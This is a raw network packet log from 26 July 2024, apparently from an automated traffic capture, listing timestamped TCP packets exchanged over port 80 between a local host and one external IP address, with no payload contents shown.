Jul 26, 2024 17:56:14.980488062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980500937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980510950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980511904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980525017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980540037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980568886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980608940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980619907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980631113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980642080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980643034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980654001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980664015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980670929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980683088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980694056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980701923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980705023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980715036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980726004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980732918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980737925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980748892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980750084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980761051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980771065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980776072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980782986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980794907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980798006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980807066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980819941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980822086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980838060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980869055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.981370926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981381893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981393099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981404066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981411934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.981415033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981426001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981439114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981450081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981452942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.981461048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981471062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.981472015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981487036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.981489897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981502056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981513977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981525898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981535912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.981537104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981548071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981563091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981563091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.981575012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.981587887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.981606960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.982229948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.982244015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.982254982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.982264996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.982271910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.982294083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.982326031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067044973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067114115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067159891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067195892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067250013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067269087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067300081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067332029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067337990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067357063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067382097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067392111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067428112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067430973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067464113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067477942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067498922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067513943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067536116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067543983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067570925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067584038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067604065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067616940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067640066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067650080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067681074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067737103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067770004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067794085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067802906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067816973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067840099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067852974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067888021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067898989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067931890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067950964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.067971945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.067980051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068006992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068018913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068041086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068054914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068074942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068089008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068108082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068123102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068140030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068156958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068172932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068186045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068207026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068219900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068240881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068252087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068275928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068288088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068322897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068526030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068577051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068583965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068622112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068634987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068655968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068671942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068691969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068706036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068725109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.068741083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.068773985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.069720984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.069760084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.069785118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.069797993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.069807053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.069833994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.069845915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.069868088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.069876909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.069900990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.069914103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.069936037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.069948912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.069967985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.069986105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.069999933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070017099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070033073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070048094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070067883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070080042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070106030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070116043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070154905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070213079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070259094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070318937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070425034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070431948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070466042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070477962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070499897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070514917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070534945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070543051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070585012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070586920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070620060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070633888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070652008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070667982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070688009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070717096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070724964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070739985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070758104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070770979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070791006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070804119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070825100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070842981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070868015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070874929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070907116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070920944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070944071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.070956945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070991039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.070992947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071026087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071041107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071058989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071069956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071098089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071105957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071141958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071156025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071178913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071190119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071213007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071223974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071247101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071261883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071279049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071291924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071312904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071325064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071346045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071360111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071378946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071400881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071403027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071417093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071420908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071441889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071448088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071464062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071465015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071480036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071491003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071500063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071516991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071549892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071675062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071687937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071698904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071710110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071719885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071722031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071731091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071742058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071748972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071753025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071767092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071772099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071778059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071789980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071794033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071799994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071811914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071816921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071827888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071841002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071841955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071852922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071865082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071870089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071876049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071887016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071894884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071897984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071908951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071918964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071922064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071933031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071938992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071943998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.071954012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.071974993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.072000980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.155832052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.155855894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.155867100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.155908108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.155936956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.155939102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.155982018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.156059980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156105042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.156127930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156140089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156152010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156171083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.156188965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.156366110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156377077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156389952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156407118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156409025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.156418085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156429052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156436920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.156476021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.156933069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156991959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.156996965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157004118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157033920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157052040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157089949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157102108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157114029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157124996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157135010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157166958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157219887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157258987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157284975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157295942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157325029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157341003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157423019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157433987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157444954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157455921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157463074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157465935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157481909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157515049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157697916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157707930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157718897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157728910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157740116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157742977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157752037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157762051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157773972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157782078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157784939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157802105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.157808065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.157834053 CEST	49704	80	192.168.2.5	85.28.47.31
